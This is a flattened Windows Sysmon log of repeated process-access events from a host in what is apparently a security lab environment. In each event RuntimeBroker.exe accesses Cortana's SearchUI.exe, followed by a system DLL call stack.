12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 